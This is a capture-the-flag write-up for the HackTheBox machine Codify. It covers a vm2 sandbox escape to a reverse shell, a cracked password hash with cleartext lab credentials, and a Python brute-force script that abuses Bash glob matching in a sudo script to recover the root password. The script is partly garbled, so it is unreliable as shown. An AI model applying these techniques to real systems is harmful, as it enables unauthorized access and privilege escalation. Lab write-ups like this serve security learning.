Codify | HackTheBox Writeup
About Machine
HackTheBox Codify presented a comprehensive learning opportunity, covering sandbox escape, password cracking, script analysis, and privilege escalation. Initial access involved exploiting a sandbox escape in a NodeJS code runner. Enumeration led to a password hash, enabling privilege escalation from “svc” to “joshua.” A vulnerable MySQL backup script, with weak password comparison logic, was exploited to gain root access. Codify emphasizes the need for a broad skill set, spanning web apps, databases, scripts, authentication, and system administration. Thorough enumeration, lateral thinking, and leveraging multiple techniques are crucial for successful hacking.
Nmap Scan
nmap -sC -sV -p- codify.htb
Pre Enumeration
I configured both web servers to host the identical web application to test our Node.js code. However, when I tried executing a reverse shell JS code, it failed due to restrictions on certain modules.
I also discovered that the server operates within a sandbox environment, utilizing the vm2 library.
While searching for recent vulnerabilities in the vm2 library, I came across one identified as CVE-2023–30547. This vulnerability allows for the circumvention of sandbox restrictions, permitting arbitrary code execution in the host context.
I followed the following adjustments and deployment of the reverse shell proof of concept.
success! I’ve effectively acquired a reverse shell.
In the directory var/www/contact, I found an SQLite database file containing a username and a bcrypt password hash.
Successfully cracked the password. Now that we have the username and password, let’s SSH into the box.
ssh joshua@codify.htb
Password: spongebob1
Got a user flag.
Privilege Escalation
sudo -l
Checking sudo permissions with sudo -l revealed joshua could run this script as root.
Analyzing /opt/scripts/, I found vulnerability in the script is related to how the password confirmation is handled. Read_More
This segment of the script evaluates the user-supplied password (USER_PASS) against the authentic database password (DB_PASS). The vulnerability lies in the use of == within [[ ]] in Bash, which conducts pattern matching instead of a direct string comparison. Consequently, the user input (USER_PASS) is treated as a pattern, and if it contains glob characters like * or ?, it may inadvertently match unintended strings.
For instance, if the actual password (DB_PASS) is password123 and the user inputs * as their password (USER_PASS), the pattern match will succeed because * matches any string, leading to unauthorized access.
This implies that we can systematically attempt to brute-force each character in the DB_PASS.
import string
import subprocess
all_characters = list(string.ascii_letters + string.digits)
final_password = ""
password_found = False
while not password_found:
for character in all_characters:
command = f"echo '{final_password}{character}*' | sudo /opt/scripts/"
output =, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout
if "Password confirmed!" in output:
final_password += character
password_found = True
I used Python script and employed it to carry out the brute force and extract the password.
Password: kljh12k3jhaskjh12kjh3
We can use this password for root.
su root
Got root flag !!!!